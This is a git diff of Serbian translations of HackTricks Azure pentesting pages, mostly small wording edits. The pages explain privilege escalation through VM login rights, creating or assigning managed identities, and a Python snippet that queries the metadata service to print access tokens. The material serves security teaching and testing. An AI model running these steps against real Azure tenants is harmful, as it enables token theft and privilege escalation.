 Ova dozvola omogućava korisniku da **prijavi kao korisnik u VM putem SSH ili RDP** (pod uslovom da je Entra ID autentifikacija omogućena u VM).
 
-Prijava putem **SSH** sa **`az ssh vm --name  --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**.
+Prijavite se putem **SSH** sa **`az ssh vm --name  --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**.
 
 ### `Microsoft.Compute/virtualMachines/loginAsAdmin/action`
 
 Ova dozvola omogućava korisniku da **prijavi kao korisnik u VM putem SSH ili RDP** (pod uslovom da je Entra ID autentifikacija omogućena u VM).
 
-Prijava putem **SSH** sa **`az ssh vm --name  --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**.
+Prijavite se putem **SSH** sa **`az ssh vm --name  --resource-group `** i putem **RDP** sa vašim **redovnim Azure akreditivima**.
 
 ## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
-Sve ove dozvole su neophodne da se **kreira VM sa specifičnom upravljanom identitetom** i da se ostavi **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega.
+Sve ove dozvole su neophodne da bi se **napravio VM sa specifičnom upravljanom identitetom** i ostavio **port otvoren** (22 u ovom slučaju). Ovo omogućava korisniku da kreira VM i poveže se na njega i **ukrade tokene upravljane identitete** kako bi eskalirao privilegije na njega.
 
 U zavisnosti od situacije, može biti potrebno više ili manje dozvola za zloupotrebu ove tehnike.
 ```bash
@@ -327,8 +327,8 @@ az vm create \
 ```
 ### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
 
-Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet** i **mnoge korisnički upravljane identitete**.\
-Zatim, iz usluge metapodataka moguće je generisati tokene za svaki od njih.
+Ove dozvole su dovoljne da **dodelite nove upravljane identitete VM-u**. Imajte na umu da VM može imati nekoliko upravljanih identiteta. Može imati **sistemsku dodeljenu identitet**, i **mnoge korisnički upravljane identitete**.\
+Zatim, iz servisa za metapodatke moguće je generisati tokene za svaki od njih.
 ```bash
 # Get currently assigned managed identities to the VM
 az vm identity show \
@@ -343,7 +343,7 @@ az vm identity assign \
 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \
 /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2
 ```
-Then the attacker needs to have **kompromitovao na neki način VM** to steal tokens from the assigned managed identities. Check **više informacija u**:
+Napadač mora **neki način kompromitovati VM** da bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**:
 
 {{#ref}}
 https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
@@ -351,6 +351,6 @@ https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/clou
 
 ### TODO: Microsoft.Compute/virtualMachines/WACloginAsAdmin/action
 
-According to the [**docs**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), this permission lets you manage the OS of your resource via Windows Admin Center as an administrator. So it looks like this gives access to the WAC to control the VMs...
+Prema [**dokumentaciji**](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/compute#microsoftcompute), ova dozvola vam omogućava da upravljate OS-om vašeg resursa putem Windows Admin Centra kao administrator. Tako da izgleda da ovo daje pristup WAC-u za kontrolu VM-ova...
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/README.md b/src/pentesting-cloud/azure-security/az-services/README.md
index efc84f06f..73539f9df 100644
--- a/src/pentesting-cloud/azure-security/az-services/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/README.md
@@ -47,7 +47,7 @@ val = os.popen(cmd).read()
 print(json.loads(val)["access_token"])
 print("ClientID/AccountID: "+json.loads(val)["client_id"])
 ```
-или unutar Python funkcije:
+ili unutar Python funkcije:
 ```python
 import logging, os
 import azure.functions as func
@@ -60,7 +60,7 @@ cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H
 val = os.popen(cmd).read()
 return func.HttpResponse(val, status_code=200)
 ```
-## List of Services
+## Lista usluga
 
 **Stranice ovog odeljka su raspoređene po Azure uslugama. U njima ćete moći da pronađete informacije o usluzi (kako funkcioniše i njene mogućnosti) kao i kako da enumerišete svaku uslugu.**
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-app-service.md b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
index 8e979d01f..9a1d7fed1 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-app-service.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-app-service.md
@@ -4,7 +4,7 @@
 
 ## Osnovne informacije o App Service
 
-Azure App Services omogućava programerima da **prave, implementiraju i skaliraju web aplikacije, pozadine mobilnih aplikacija i API-jeve bez problema**. Podržava više programskih jezika i integriše se sa raznim Azure alatima i uslugama za poboljšanu funkcionalnost i upravljanje.
+Azure App Services omogućava programerima da **prave, implementiraju i skaliraju web aplikacije, mobilne aplikacije i API-je bez problema**. Podržava više programskih jezika i integriše se sa raznim Azure alatima i uslugama za poboljšanu funkcionalnost i upravljanje.
 
 Svaka aplikacija radi unutar sandbox-a, ali izolacija zavisi od App Service planova
 
@@ -22,7 +22,7 @@ U stvari, neke od **karakteristika vezanih za bezbednost** koje App services kor
 
 ## Osnovna autentifikacija
 
-Kada kreirate web aplikaciju (i obično Azure funkciju), moguće je naznačiti da li želite da bude omogućena osnovna autentifikacija. Ovo u suštini **omogućava SCM i FTP** za aplikaciju, tako da će biti moguće implementirati aplikaciju koristeći te tehnologije.\
+Kada kreirate web aplikaciju (a obično i Azure funkciju), moguće je naznačiti da li želite da bude omogućena osnovna autentifikacija. Ovo u suštini **omogućava SCM i FTP** za aplikaciju, tako da će biti moguće implementirati aplikaciju koristeći te tehnologije.\
 Pored toga, da bi se povezali sa njima, Azure pruža **API koji omogućava dobijanje korisničkog imena, lozinke i URL-a** za povezivanje sa SCM i FTP serverima.
 
 - Autentifikacija: az webapp auth show --name lol --resource-group lol_group
@@ -87,9 +87,6 @@ az webapp config storage-account list --name  --resource-gl_group
 
 
 
-
-
-
 # List all the functions
 az functionapp list
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
index bdf1e3ef9..f389bb2e5 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-application-proxy.md
@@ -13,8 +13,8 @@ Radi ovako:
 

 
 1. Nakon što korisnik pristupi aplikaciji putem krajnje tačke, korisnik se preusmerava na **Azure AD stranicu za prijavu**.
-2. Nakon **uspešne prijave**, Azure AD šalje **token** na korisnikov klijentski uređaj.
-3. Klijent šalje token **Application Proxy servisu**, koji preuzima korisničko ime (UPN) i ime sigurnosnog subjekta (SPN) iz tokena. **Application Proxy zatim šalje zahtev konektoru Application Proxy-a**.
+2. Nakon **uspešne prijave**, Azure AD šalje **token** korisnikovom klijentskom uređaju.
+3. Klijent šalje token **Application Proxy servisu**, koji preuzima korisničko glavno ime (UPN) i sigurnosno glavno ime (SPN) iz tokena. **Application Proxy zatim šalje zahtev konektoru Application Proxy-a**.
 4. Ako ste konfigurisali jednostavno prijavljivanje, konektor vrši bilo koju **dodatnu autentifikaciju** potrebnu u ime korisnika.
 5. Konektor šalje zahtev **lokalnoj aplikaciji**.
 6. **Odgovor** se šalje kroz konektor i Application Proxy servis **korisniku**.
@@ -31,7 +31,7 @@ Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -eq "Name"}
 # to find users and groups assigned to the application. Pass the ObjectID of the Service Principal to it
 Get-ApplicationProxyAssignedUsersAndGroups -ObjectId 
 ```
-## References
+## Reference
 
 - [https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy](https://learn.microsoft.com/en-us/azure/active-directory/app-proxy/application-proxy)
 
diff --git a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
index 22956602a..8272df1d1 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-arm-templates.md
@@ -2,15 +2,15 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Osnovne informacije
+## Osnovne Informacije
 
-[Iz dokumenata:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Da implementirate **infrastrukturu kao kod za vaša Azure rešenja**, koristite Azure Resource Manager šablone (ARM šabloni). Šablon je datoteka u JavaScript Object Notation (**JSON**) formatu koja **definiše** **infrastrukturu** i konfiguraciju za vaš projekat. Šablon koristi deklarativnu sintaksu, koja vam omogućava da navedete šta nameravate da implementirate bez potrebe da pišete redosled programskih komandi za njegovo kreiranje. U šablonu, specificirate resurse koje treba implementirati i svojstva za te resurse.
+[Iz dokumenata:](https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/overview) Da implementirate **infrastrukturu kao kod za vaše Azure rešenja**, koristite Azure Resource Manager šablone (ARM šabloni). Šablon je JavaScript Object Notation (**JSON**) fajl koji **definiše** **infrastrukturu** i konfiguraciju za vaš projekat. Šablon koristi deklarativnu sintaksu, koja vam omogućava da navedete šta nameravate da implementirate bez potrebe da pišete redosled programskih komandi za njegovo kreiranje. U šablonu, specificirate resurse koje treba implementirati i svojstva za te resurse.
 
 ### Istorija
 
-Ako možete da mu pristupite, možete imati **informacije o resursima** koji nisu prisutni, ali bi mogli biti implementirani u budućnosti. Štaviše, ako je **parametar** koji sadrži **osetljive informacije** označen kao "**String**" **umesto** "**SecureString**", biće prisutan u **čistom tekstu**.
+Ako možete da mu pristupite, možete imati **informacije o resursima** koji nisu prisutni, ali bi mogli biti implementirani u budućnosti. Štaviše, ako je **parametar** koji sadrži **osetljive informacije** označen kao "**String**" **umesto** kao "**SecureString**", biće prisutan u **čistom tekstu**.
 
-## Pretraga osetljivih informacija
+## Pretraga Osetljivih Informacija
 
 Korisnici sa dozvolama `Microsoft.Resources/deployments/read` i `Microsoft.Resources/subscriptions/resourceGroups/read` mogu **čitati istoriju implementacije**.
 ```powershell
diff --git a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
index 8f757459f..77f5b7976 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
@@ -8,9 +8,9 @@
 
 Ovo su poput "**zakazanih zadataka**" u Azure-u koji će vam omogućiti da izvršavate stvari (akcije ili čak skripte) za **upravljanje**, proveru i konfiguraciju **Azure okruženja**.
 
-### Račun za izvršavanje
+### Run As nalog
 
-Kada se koristi **Run as Account**, kreira se Azure AD **aplikacija** sa samopotpisanim sertifikatom, kreira se **servisni principal** i dodeljuje se **Contributor** uloga za račun u **trenutnoj pretplati** (mnogo privilegija).\
+Kada se koristi **Run as Account**, kreira se Azure AD **aplikacija** sa samopotpisanim sertifikatom, kreira se **servisni principal** i dodeljuje se **Contributor** uloga za nalog u **trenutnoj pretplati** (mnogo privilegija).\
 Microsoft preporučuje korišćenje **Managed Identity** za Automation Account.
 
 > [!WARNING]
@@ -21,24 +21,24 @@ Microsoft preporučuje korišćenje **Managed Identity** za Automation Account.
 **Runbooks** vam omogućavaju da **izvršavate proizvoljni PowerShell** kod. Ovo bi moglo biti **zloupotrebljeno od strane napadača** da ukrade dozvole **pridruženog principala** (ako ih ima).\
 U **kod**-u **Runbooks** takođe možete pronaći **osetljive informacije** (kao što su kredencijali).
 
-Ako možete **čitati** **poslove**, uradite to jer **sadrže** **izlaz** izvršenja (potencijalne **osetljive informacije**).
+Ako možete **pročitati** **poslove**, uradite to jer **sadrže** **izlaz** izvršenja (potencijalne **osetljive informacije**).
 
 Idite na `Automation Accounts` --> `